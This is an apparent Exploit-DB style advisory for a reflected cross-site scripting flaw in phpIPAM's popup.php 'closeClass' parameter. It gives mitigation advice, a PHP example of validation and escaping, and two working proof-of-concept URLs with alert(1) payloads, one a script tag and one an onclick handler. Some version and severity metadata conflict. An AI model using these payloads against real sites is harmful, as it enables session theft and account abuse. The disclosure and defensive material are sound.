Vendor: phpIPAM
By: CodeSecLab
CVSS: 6.1 HIGH
Reflected Cross Site Scripting (XSS)
CWE: 79
Product Name: phpIPAM
Affected Version From: 1.5.2001
Affected Version To: 1.6
Patch Exists: NO
Related CVE: CVE-2023-24657
CPE: a:phpipam:phpipam:1.5.1
Platforms Tested: Ubuntu, Windows
2024

phpIPAM 1.6 – Reflected Cross Site Scripting (XSS)

phpIPAM version 1.6 is vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied data in the 'closeClass' parameter of the 'popup.php' script. An attacker can exploit this by injecting malicious scripts into the parameter, leading to script execution in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, input validation and output encoding should be implemented to ensure that user-supplied data is properly sanitized before being displayed. Additionally, updating to a patched version (if available) is recommended.
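
One way to apply both controls to the 'closeClass' sink, as an added example (not phpIPAM's code or its patch). The helper names, the `class="btn ..."` markup and the allowlist pattern are assumptions, since the page only states that the value is reflected inside an HTML attribute; the `mixed` type requires PHP 8.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not phpIPAM code): input validation.
// Accept only a single short CSS class token, otherwise fall back to a default.
function safe_close_class(mixed $raw, string $default = ''): string
{
    // closeClass[]=x arrives as an array; refuse anything that is not a string.
    if (!is_string($raw)) {
        return $default;
    }
    // Allowlist: starts with a letter, then letters, digits, '_' or '-'.
    // \A and \z anchor the whole string, so a trailing newline cannot slip through.
    if (preg_match('/\A[A-Za-z][A-Za-z0-9_-]{0,63}\z/', $raw) !== 1) {
        return $default;
    }
    return $raw;
}

// Hypothetical helper: output encoding for an HTML attribute value.
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumed markup for illustration. The value is validated first and still
// encoded at the point of output, so neither control is a single point of failure.
function render_close_link(mixed $raw): string
{
    return '<a class="btn ' . attr(safe_close_class($raw)) . '">Close</a>';
}

// Constructed sample inputs: one legitimate class name, the two decoded
// payload shapes quoted in this advisory, and an array-typed parameter.
$samples = [
    'hidePopup2',
    '" onclick="alert(1)"',
    '"><script>alert(1)</script>',
    ['nested' => 'array'],
];
foreach ($samples as $sample) {
    echo render_close_link($sample), PHP_EOL;
    // Encoding alone, for inputs that must be displayed rather than rejected.
    echo is_string($sample) ? attr($sample) : '(non-string rejected)', PHP_EOL;
}
```

In a request handler the argument would be `$_GET['closeClass'] ?? ''` rather than `$_REQUEST`, so the value can only come from the query string the page is meant to read.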

Exploit-DB raw data:

# Exploit Title: phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.5.1
# Tested on: Ubuntu Windows
# CVE : CVE-2023-24657
PoC:
1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22

{
    "Sink": "print @$_REQUEST['closeClass']",
    "Vulnerable Variable": "closeClass",
    "Source": "$_REQUEST['closeClass']",
    "Sanitization Mechanisms Before Patch": "None",
    "Sink Context Constraints": "Reflected within HTML attributes without escaping",
    "Attack Payload": "\" onclick=\"alert(1)\"",
    "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
    "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
    "Request Method": "GET",
    "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"
}


[Replace Your Domain Name]